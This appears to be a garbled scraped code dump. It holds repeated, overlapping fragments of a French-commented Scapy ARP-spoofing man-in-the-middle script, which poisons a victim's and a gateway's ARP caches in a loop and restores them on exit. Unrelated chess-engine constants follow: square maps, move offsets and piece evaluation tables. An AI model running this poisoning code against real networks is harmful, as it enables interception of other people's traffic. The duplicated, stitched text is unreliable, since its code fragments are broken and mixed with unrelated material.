\"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet", "à l'adresse MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip)", "lui dire que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst,", "build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip,", "send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst,", "# Faisons croire à pdst que psrc est à l'adresse MAC hwsrc (qui", "le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm):", "send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est", "routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau", "le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\"", "dit au routeur qu'il doit s'occuper de la victime. p2 est un paquet", "Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut qu'ils reparlent", "def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac", "sur les couples (envoyés, reçus) des answers (réponses). for snd, rcv in ans:", "broadcaster sur le réseau. timeout=2, # timeout qu'on attend avant une réponse en", "trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être", "mais on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. #", "trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst in", "print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip)", "le réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. 
# On", "build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où gate = routeur", "\"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un", "= lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip,", "échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur le réseau (MAC", "on CRIE sur le réseau qu'il faut qu'ils reparlent entre eux. # (ici", "l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé", "= 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip):", "fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm():", "get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\"", "de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va", "victime qu'il doit maintenant discuter avec le routeur et nous on quitte la", "psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+]", "fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm,", "paquets (p1, p2). p1 est un paquet ARP qui dit au routeur qu'il", "et nous on quitte la scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip", "(for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau qu'il", "qu'on attend avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1", "un paquet ARP qui dit à la victime qu'il doit maintenant discuter avec", ") def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!]", "la victime qu'il doit maintenant discuter avec le routeur et nous on quitte", "\"\"\" Fourberie de Scapy n°1. 
\"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip,", "trouver l'adresse MAC de la cible, échec de l'attaque\") return try: gate_mac =", "qui dit au routeur qu'il doit s'occuper de la victime. p2 est un", "un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout qu'on attend", "réseau (ici vmnet1 le réseau interne de VMware) inter=0.1) # intervalle entre deux", "ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à", "ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def", "= 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une", "victim = victime. La paire retournée sont deux paquets (p1, p2). p1 est", "deux paquets (p1, p2). p1 est un paquet ARP qui dit au routeur", "on crie au sens de, on envoie 7 fois le paquet pour être", "qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1.", "scène. \"\"\" gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit", "return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets ARP où", "réseau interne de VMware) inter=0.1) # intervalle entre deux paquets. # On itère", "s'occuper de la victime. p2 est un paquet ARP qui dit à la", "while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ ==", "à l'IP par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), #", "au routeur qu'il doit s'occuper de la victime. p2 est un paquet ARP", "en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def", "une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP", "Exception: print(\"[!] 
Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+]", "faut qu'ils reparlent entre eux. # (ici on crie au sens de, on", "reçus) des answers (réponses). for snd, rcv in ans: # On renvoie l'adresse", "l'IP par une requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un", "timeout qu'on attend avant une réponse en secondes. iface=interface, # interface réseau (ici", "est un paquet ARP qui dit à la victime qu'il doit maintenant discuter", "adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if", "réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de", "# intervalle entre deux paquets. # On itère sur les couples (envoyés, reçus)", "pdst que psrc est à l'adresse MAC hwsrc (qui est la nôtre en", "être déposé sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac)", "count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc,", "une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne", "make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac =", "des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre paire", "7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\"", "de `pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc` build", "MAC du routeur, échec de l'attaque\") print(\"[+] Le cyanure va être déposé sur", "est à l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant", "print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\") return", "un paquet ARP qui dit au routeur qu'il doit s'occuper de la victime.", "(réponses). 
for snd, rcv in ans: # On renvoie l'adresse MAC de la", "print(e) print(\"[!] Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\")", "réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de paquets", "build construit un paquet ARP à destination de `pdst` pour lui dire que", "l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse", "à pdst que psrc est à l'adresse MAC hwsrc (qui est la nôtre", "MAC de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except", "victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des", "sur le réseau (MAC adresses obtenues)\") while True: try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except", "la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt", "hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration", "le réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface,", "psrc=psrc, hwdst=hwdst) # Faisons croire à pdst que psrc est à l'adresse MAC", "en l'envoyeant bien à l'adresse MAC hwdst en réalité. ) def mitm(): try:", "secondes. iface=interface, # interface réseau (ici vmnet1 le réseau interne de VMware) inter=0.1)", "for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais on CRIE sur", "que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc:", "= get_mac(victim_ip) except Exception as e: print(e) print(\"[!] 
Impossible de trouver l'adresse MAC", "pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip,", "gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim): # Surtout, on l'envoie mais", "eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac, victim_ip)) for pkt in (for_gate, for_victim):", "\"\"\" Crée une paire de paquets ARP où gate = routeur et victim", "mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de", "= victime. La paire retournée sont deux paquets (p1, p2). p1 est un", "reconnecte le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip),", "* BROADCAST = \"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\"", "ARP où gate = routeur et victim = victime. La paire retournée sont", "= \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse", "def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for pdst, psrc, hwdst", "print(\"[!] Impossible de trouver l'adresse MAC du routeur, échec de l'attaque\") print(\"[+] Le", "un paquet ARP à destination de `pdst` pour lui dire que `psrc` a", "qu'il doit s'occuper de la victime. p2 est un paquet ARP qui dit", "à l'adresse MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien", "qui dit à la victime qu'il doit maintenant discuter avec le routeur et", "paquet ARP qui dit au routeur qu'il doit s'occuper de la victime. p2", "victime. La paire retournée sont deux paquets (p1, p2). p1 est un paquet", "doit maintenant discuter avec le routeur et nous on quitte la scène. \"\"\"", "pour être sûr qu'ils le reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie", "l'adresse MAC de la réponse reçue. 
return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée", "dire que `psrc` a pour adresse MAC `hwsrc` build = lambda pdst, psrc,", "restauration. # i.e. on reconnecte le routeur et la victime entre eux. for_gate,", "réseau. timeout=2, # timeout qu'on attend avant une réponse en secondes. iface=interface, #", "# On construit notre paire de restauration. # i.e. on reconnecte le routeur", "ARP à destination de `pdst` pour lui dire que `psrc` a pour adresse", "psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc,", "\"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send(", "nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité. )", "Le cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while True:", "Récupère l'adresse MAC associée à l'IP par une requête ARP. \"\"\" ans, unans", "pdst=pdst, psrc=psrc, hwdst=BROADCAST, hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad():", "est la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en", "get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de", "hwsrc=hwsrc) return build(gate_ip, victim_ip, victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des", "try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver l'adresse MAC du", "où gate = routeur et victim = victime. La paire retournée sont deux", "doit s'occuper de la victime. p2 est un paquet ARP qui dit à", "pour adresse MAC `hwsrc` build = lambda pdst, psrc, hwsrc: ARP(op=2, pdst=pdst, psrc=psrc,", "((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst, psrc=psrc, hwdst=hwdst) # Faisons", "qu'ils reparlent entre eux. 
# (ici on crie au sens de, on envoie", "le routeur et la victime entre eux. for_gate, for_victim = build_arp_pair_packets((gate_mac, gate_ip), (victim_mac,", "réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e)", "gate_mac, gate_ip = gate_info victim_mac, victim_ip = victim_info # build construit un paquet", "Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à broadcaster sur le réseau. timeout=2, # timeout", "try: trick_them(gate_mac, victim_mac) time.sleep(1.5) except KeyboardInterrupt: make_them_think_we_didnt_do_something_bad() break if __name__ == '__main__': mitm()", "entre eux. # (ici on crie au sens de, on envoie 7 fois", "reçoivent.) send(pkt, count=HOW_MUCH_TO_SPAM_PPL) def trick_them(gm, vm): \"\"\" Fourberie de Scapy n°1. \"\"\" for", "# On itère sur les couples (envoyés, reçus) des answers (réponses). for snd,", "gate_mac = get_mac(gate_ip) # On construit notre paire de restauration. # i.e. on", "\"FF:FF:FF:FF:FF:FF\" HOW_MUCH_TO_SPAM_PPL = 7 victim_ip = \"192.168.79.129\" gate_ip = \"192.168.79.254\" interface = 'vmnet1'", "for_victim): # Surtout, on l'envoie mais on CRIE sur le réseau qu'il faut", "cyanure va être déposé sur le réseau (MAC adresses obtenues)\") while True: try:", "crie au sens de, on envoie 7 fois le paquet pour être sûr", "'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par une requête", "qu'il doit maintenant discuter avec le routeur et nous on quitte la scène.", "la nôtre en fait) en l'envoyeant bien à l'adresse MAC hwdst en réalité.", "def mitm(): try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible", "`pdst` pour lui dire que `psrc` a pour adresse MAC `hwsrc` build =", "notre paire de restauration. # i.e. on reconnecte le routeur et la victime", "de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception: print(\"[!] Impossible de trouver", "Fourberie de Scapy n°1. 
\"\"\" for pdst, psrc, hwdst in ((victim_ip, gate_ip, vm),", "requête ARP. \"\"\" ans, unans = srp( Ether(dst=BROADCAST)/ARP(pdst=ip), # un paquet ARP à", "à la victime qu'il doit maintenant discuter avec le routeur et nous on", "MAC hwsrc (qui est la nôtre en fait) en l'envoyeant bien à l'adresse", "p1 est un paquet ARP qui dit au routeur qu'il doit s'occuper de", "victim_mac), build(victim_ip, gate_ip, gate_mac) def make_them_think_we_didnt_do_something_bad(): print(\"[+] Restauration des caches ARP des cibles\")", "avant une réponse en secondes. iface=interface, # interface réseau (ici vmnet1 le réseau", "la réponse reçue. return rcv.sprintf(r\"%Ether.src%\") def build_arp_pair_packets(gate_info, victim_info): \"\"\" Crée une paire de", "try: victim_mac = get_mac(victim_ip) except Exception as e: print(e) print(\"[!] Impossible de trouver", "maintenant discuter avec le routeur et nous on quitte la scène. \"\"\" gate_mac,", "de VMware) inter=0.1) # intervalle entre deux paquets. # On itère sur les", "avec le routeur et nous on quitte la scène. \"\"\" gate_mac, gate_ip =", "except Exception as e: print(e) print(\"[!] Impossible de trouver l'adresse MAC de la", "de, on envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.)", "ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit notre", "MAC hwdst en réalité. ) def mitm(): try: victim_mac = get_mac(victim_ip) except Exception", "caches ARP des cibles\") victim_mac = get_mac(victim_ip) gate_mac = get_mac(gate_ip) # On construit", "on envoie 7 fois le paquet pour être sûr qu'ils le reçoivent.) send(pkt,", "interface = 'vmnet1' def get_mac(ip): \"\"\" Récupère l'adresse MAC associée à l'IP par", "# timeout qu'on attend avant une réponse en secondes. iface=interface, # interface réseau", "(p1, p2). 
p1 est un paquet ARP qui dit au routeur qu'il doit", "pdst, psrc, hwdst in ((victim_ip, gate_ip, vm), (gate_ip, victim_ip, gm)): send( ARP(op=2, pdst=pdst,", "victim_info # build construit un paquet ARP à destination de `pdst` pour lui", "de la cible, échec de l'attaque\") return try: gate_mac = get_mac(gate_ip) except Exception:", "Impossible de trouver l'adresse MAC de la cible, échec de l'attaque\") return try:" ]
[ "Directions pawns can move: forward 1, forward 2, right (capture), left (capture) PAWN_OFFSETS", "-1.0, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0],", "'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2': 96, 'b2': 97, 'c2':", "0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15, 0,", "118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'], 'flag': BITS['QSIDE_CASTLE']}, {'square':", "0.0, -0.5], [ 0.0, 0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL", ": 'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w'", "0, 0, 0,20, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24,", ": 'n', 3 : 'b', 4 : 'r', 5 : 'q', 6 :", "33, 31, 14], 'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1],", "0, 0, 0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0,", "-1.0, -2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0,", "left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w': [-16, -32,", "-2.0, -2.0, -2.0, -2.0, -2.0, -2.0, -1.0], [ 2.0, 2.0, 0.0, 0.0, 0.0,", "0, 0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0,", "'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL = [ [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0,", "} MCTS_MAPPING = { 'p' : 1, 'n' : 2, 'b' : 3,", "-1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [", "0, 0, 17, 16, 15, 0, 0, 0, 0, 0, 0, 0, 1,", "0.5, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.0, 0.0,", "-1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0, 0.0, 0.0,", "0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0, 0, 24,", "'c3': 82, 'd3': 83, 'e3': 84, 'f3': 85, 'g3': 86, 'h3': 87, 'a2':", "0.0, 0.0, -1.0], [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0] ]", "0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24,", "'p', 'KSIDE_CASTLE': 'k', 'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2,", "'q' : 5, 'k' : 6, } MCTS_DECODER = { 1 : 'p',", "BITS['KSIDE_CASTLE']}], 'b': [{'square': SQUARES['a8'], 'flag': BITS['QSIDE_CASTLE']}, {'square': SQUARES['h8'], 'flag': BITS['KSIDE_CASTLE']}] } KING_EVAL =", "0.5, 0.0, -1.0], [ -0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [", "5, 'g8': 6, 'h8': 7, 
'a7': 16, 'b7': 17, 'c7': 18, 'd7': 19,", "'n': 1, 'b': 2, 'r': 3, 'q': 4, 'k': 5 } FLAGS =", "0, 0, 0, 0, 0, 0,-15, 0,-16, 0,-17, 0, 0, 0, 0, 0,", "[ [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0,", "-15, 1, 17, 16, 15, -1] } MCTS_MAPPING = { 'p' : 1,", "SHIFTS = { 'p': 0, 'n': 1, 'b': 2, 'r': 3, 'q': 4,", "70, 'h4': 71, 'a3': 80, 'b3': 81, 'c3': 82, 'd3': 83, 'e3': 84,", "= ['1-0', '0-1', '1/2-1/2', '*'] # Directions pawns can move: forward 1, forward", "0, 0, 0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 17, 0, 16, 0, 15, 0,", "'g7': 22, 'h7': 23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6':", "0, 0, 0, 0, 0, 0, 0,20, 2, 24, 2,20, 0, 0, 0,", "0, 0, 0, 0, 0,-17, 0, 0, -15, 0, 0, 0, 0, 0,", "-3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0,", "0.0, 0.0, 0.0, 0.0, 0.0], [ 0.5, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0,", "0, 0, 0, 0, 17, 0, 0, 0, 16, 0, 0, 0, 15,", "-0.5], [ -0.5, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5], [ -0.5, 0.0,", "5.0, 5.0, 5.0], [1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5,", "'e1': 116, 'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w':", "16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15, -1], 'k': [-17,", "= [ [ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0,", "-1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -1.0], [ -0.5, 0.0,", "0, 0, 0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0,", "0,-16, 0, 0, 0, 0, 0, 0,-17 ] SHIFTS = { 'p': 0,", "0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 0.5, 0.5,", "1.0, 0.5, 0.5, -1.0], [ -1.0, 0.0, 1.0, 1.0, 1.0, 1.0, 0.0, -1.0],", "-1.0, -1.0, -2.0] ] KNIGHT_EVAL = [ [-5.0, -4.0, -3.0, -3.0, -3.0, -3.0,", "0.5, 1.0, 2.5, 2.5, 1.0, 0.5, 0.5], [0.0, 0.0, 0.0, 2.0, 2.0, 0.0,", "0.0, 2.0, 2.0, 0.0, 0.0, 0.0], [0.5, -0.5, -1.0, 0.0, 0.0, -1.0, -0.5,", "'r': [-16, 1, 16, -1], 'q': [-17, -16, -15, 1, 17, 16, 15,", "= 7 RANK_2 = 6 RANK_3 = 5 RANK_4 = 4 RANK_5 =", "{ 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE': 8, 'PROMOTION': 16, 'KSIDE_CASTLE': 32,", "0, 0, 
0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 20,0,", "0, 0, 0, 24,24,24,24,24,24,56, 0, 56,24,24,24,24,24,24, 0, 0, 0, 0, 0, 0, 2,53,", "'q' KING = 'k' SYMBOLS = 'pnbrqkPNBRQK' DEFAULT_POSITION = 'rnbqkbnr/pppppppp/8/8/8/8/PPPPPPPP/RNBQKBNR w KQkq -", "0, 0,20, 0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0,", "0.0, 0.0, 0.0, -2.0, -4.0], [-3.0, 0.0, 1.0, 1.5, 1.5, 1.0, 0.0, -3.0],", "-1.0, -0.5, 0.5], [0.5, 1.0, 1.0, -2.0, -2.0, 1.0, 1.0, 0.5], [0.0, 0.0,", "0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0, 0,", "0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,", "'r', 5 : 'q', 6 : 'k' } MCTS_COLOR_MAP = { 'w' :", "[ -2.0, -1.0, -1.0, -0.5, -0.5, -1.0, -1.0, -2.0], [ -1.0, 0.0, 0.0,", "'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37, 'g6': 38, 'h6': 39, 'a5':", "102, 'h2': 103, 'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116,", "0, 0,20, 0, 0, 0, 24, 0, 0, 0,20, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0, 0, 0, 0, 0, 0,", "-5.0, -5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0,", "right (capture), left (capture) PAWN_OFFSETS = { 'b': [16, 32, 17, 15], 'w':", "0, 0, 24, 0, 0, 0, 0, 0, 0,20 ] RAYS = [", "[1.0, 1.0, 2.0, 3.0, 3.0, 2.0, 1.0, 1.0], [0.5, 0.5, 1.0, 2.5, 2.5,", "23, 'a6': 32, 'b6': 33, 'c6': 34, 'd6': 35, 'e6': 36, 'f6': 37,", "'f1': 117, 'g1': 118, 'h1': 119 } ROOKS = { 'w': [{'square': SQUARES['a1'],", "0, 0, 0, 0, 0, 0, 0, 0,20, 0, 0, 0, 24, 0,", "0, 0, 0, 24, 0, 0, 0, 0, 0,20, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 0,20, 0, 0, 20,0, 0, 0, 0, 0,", "-5.0, -4.0, -4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0],", "0, 0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0,", "15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 0,", "0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5, 0.5,", "0, 0,-16, 0, 0, 0, 0,-17, 0, 0, 0, 0,-15, 0, 0, 0,", "'a1': 112, 'b1': 113, 'c1': 114, 'd1': 115, 'e1': 116, 'f1': 117, 'g1':", "-0.5, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 0.0, 0.0, 0.5, 0.5,", "0.0, 0.0, 0.5, 0.5, 0.0, 0.0, 0.0] ] BISHOP_EVAL = [ [ -2.0,", "[ 0.0, 0.0, 0.5, 0.5, 0.5, 0.5, 0.0, -0.5], [ 
-1.0, 0.5, 0.5,", "-1, -1,-1, -1, -1, -1, 0, 0, 0, 0, 0, 0, 0,-15,-16,-17, 0,", "'QSIDE_CASTLE': 'q' } BITS = { 'NORMAL': 1, 'CAPTURE': 2, 'BIG_PAWN': 4, 'EP_CAPTURE':", "0, 0,-17, 0, 0, 0, 0, 0, 0, 0, 0,-15, 0, 0, 0,-16,", "'b': [-17, -15, 17, 15], 'r': [-16, 1, 16, -1], 'q': [-17, -16,", "0.5, 0.0, 0.0, 0.0, 0.0, 0.5, -1.0], [ -2.0, -1.0, -1.0, -1.0, -1.0,", "0, 0, 0, 15, 0, 0, 0, 0, 17, 0, 0, 0, 0,", "1.5, 1.5, 1.0, 0.0, -3.0], [-3.0, 0.5, 1.5, 2.0, 2.0, 1.5, 0.5, -3.0],", "0, 0, 0,-15, 0, 0, 0, 0,-16, 0, 0, 0, 0,-17, 0, 0,", "0, 0, 0, 0, 0, 15, 0, 0, 17, 0, 0, 0, 0,", "5, 'k' : 6, } MCTS_DECODER = { 1 : 'p', 2 :", "-1.0], [ -1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, -1.0], [ -1.0, 0.5,", "0, 0, 0, 16, 0, 0, 0, 15, 0, 0, 0, 0, 0,", "0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 15, 0,", "0,20, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 24,", "0, 17, 0, 16, 0, 15, 0, 0, 0, 0, 0, 0, 0,", "15], 'w': [-16, -32, -17, -15] } # Directions different pieces can move", "0.0, 0.0, -1.0], [ -1.0, 0.0, 0.5, 1.0, 1.0, 0.5, 0.0, -1.0], [", "-4.0, -3.0], [ -2.0, -3.0, -3.0, -4.0, -4.0, -3.0, -3.0, -2.0], [ -1.0,", "-5.0, -4.0, -4.0, -3.0], [ -3.0, -4.0, -4.0, -5.0, -5.0, -4.0, -4.0, -3.0],", "0.0, 2.0, 2.0 ], [ 2.0, 3.0, 1.0, 0.0, 0.0, 1.0, 3.0, 2.0", "-4.0, -5.0] ] PAWN_EVAL = [ [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,", "1, 1, 1, 1, 1, 1, 1, 0, -1, -1, -1,-1, -1, -1,", "0, 0, 0,-15, 0, 0, 0,-16, 0, 0, 0,-17, 0, 0, 0, 0,", "0, 